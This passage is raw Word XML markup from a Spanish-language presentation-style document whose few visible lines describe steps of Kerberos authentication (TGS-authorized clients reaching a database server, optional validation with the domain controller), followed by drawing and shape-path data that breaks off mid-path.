        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D5DD8A8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="044D82B2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C9B9C17" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68BFE563" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24CFE84C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="570F8393" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="093781B0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3176E3E7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="91"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3911D9C7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:ind w:left="13809"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C2A363C" wp14:editId="7A6F9B66">
                <wp:extent cx="2880360" cy="523240"/>
                <wp:effectExtent l="9525" t="0" r="5714" b="10159"/>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523240"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7ED6DB52" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="63" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="793" w:hanging="622"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="28"/>
                              </w:rPr>
                              <w:t>2. Se realizan otras solicitudes de validación opcionales con el DC.</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="7C2A363C" id="Textbox 195" o:spid="_x0000_s1115" type="#_x0000_t202" style="width:226.8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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="7ED6DB52" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="63" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="793" w:hanging="622"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>2. Se realizan otras solicitudes de validación opcionales con el DC.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDC7E5B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E86BCF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C7CBCB1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="185F99A3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2695B2B2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57F51E25" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71925638" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="61"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="160287F3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:left="7985" w:right="5663" w:firstLine="24"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>1. Los clientes que utilizan el TGS asignado están autenticados y autorizados</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A263470" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="339" w:lineRule="exact"/>
        <w:ind w:left="8899"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>para acceder al servidor de base de datos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B6B19D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49C89081" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5C6EBE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B114C9C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B4D17D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D599EE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D7EFA0E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B4BC693" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="350DC6ED" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C953D8C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="346720B1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="44"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="735DF173"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58</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7604D018" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId84"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="20" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31B02AB8"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55520" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="26A97EC9" wp14:editId="4F7199B2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1754124</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>18283</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8684260" cy="651383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4260" cy="6513830"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8684260" cy="6513830"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="197" name="Image 197"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId79" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8683750" cy="6513608"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="198" name="Image 198"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId85" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="1847976" y="141863"/>
                            <a:ext cx="6163436" cy="338074"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="199" name="Graphic 199"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="643381" y="1248540"/>
                            <a:ext cx="6751320" cy="5093335"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="6751320" h="5093335">
                                <a:moveTo>
                                  <a:pt x="636397" y="4626584"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="557530" y="4658715"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="581355" y="4679632"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="512826" y="4757001"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="473837" y="4800016"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="435737" y="4841392"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="398272" y="4880851"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="361950" y="4917884"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="326644" y="4952060"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="292608" y="4983150"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="260096" y="5010594"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214464" y="5044084"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214261" y="5044275"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="213893" y="5044478"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="213283" y="5044897"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="200279" y="5053101"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="160921" y="5072507"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="137160" y="5079111"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="136626" y="5079111"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="126365" y="5080228"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="118173" y="5080228"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="108800" y="5078552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107835" y="5078387"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="99999" y="5075631"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="99199" y="5075364"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="91401" y="5071110"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90970" y="5070767"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="83312" y="5064938"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82550" y="5064087"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="76200" y="5057762"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="75488" y="5056771"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="52070" y="5015573"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38150" y="4970462"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="37909" y="4969649"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="34061" y="4952060"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30695" y="4933962"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="28346" y="4919650"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="28105" y="4917884"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="28003" y="4917554"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="27711" y="4915789"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="27787" y="4915586"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25031" y="4895621"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="20662" y="4853825"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17373" y="4808601"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="14998" y="4759020"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13081" y="4682096"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12700" y="4628794"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12700" y="4574425"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13081" y="4519206"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13716" y="4463580"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1016" y="4463440"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="4574425"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="4628794"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="279" y="4658715"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="381" y="4670095"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1511" y="4733506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3276" y="4783086"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6032" y="4830280"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9906" y="4874577"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="15240" y="4917554"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="21844" y="4955705"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="34925" y="5005603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="52451" y="5045799"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="84328" y="5081689"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="127381" y="5092903"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="139573" y="5091582"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="152146" y="5088763"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="165100" y="5084496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="175437" y="5080228"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="178155" y="5079111"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="221361" y="5054803"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="267970" y="5020526"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="300990" y="4992725"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="335280" y="4961331"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370840" y="4926927"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="407416" y="4889690"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="445008" y="4850079"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="483235" y="4808601"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="522224" y="4765510"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="590905" y="4688014"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="614807" y="4708982"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="624992" y="4670095"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="636397" y="4626584"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                              <a:path w="6751320" h="5093335">
                                <a:moveTo>
                                  <a:pt x="3020187" y="1615567"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="3013976" y="1596009"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2994406" y="1534287"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2944876" y="1603629"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2976168" y="1608594"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2972143" y="1634185"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2963164" y="1686433"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2953766" y="1737233"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2942971" y="1787779"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2931033" y="1838198"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2917253" y="1888286"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2917215" y="1888515"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2902445" y="1935861"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2883916" y="1987423"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2863723" y="2036445"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2840736" y="2085086"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2814777" y="2133079"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2814739" y="2133244"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2784906" y="2181771"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2753766" y="2226322"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2716149" y="2274189"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2675382" y="2320036"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2630297" y="2365375"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2581364" y="2409545"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2528709" y="2453309"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2470912" y="2497709"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2410968" y="2540762"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2375687" y="2564904"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2315083" y="2604643"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2281809" y="2625725"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2247900" y="2646807"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2213356" y="2667762"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2142744" y="2709291"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2073287" y="2748877"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1995932" y="2791587"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1843532" y="2873248"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1609217" y="2994787"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1615059" y="3005963"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1849374" y="2884424"/>
                                </a:lnTo>
                                <a:lnTo>
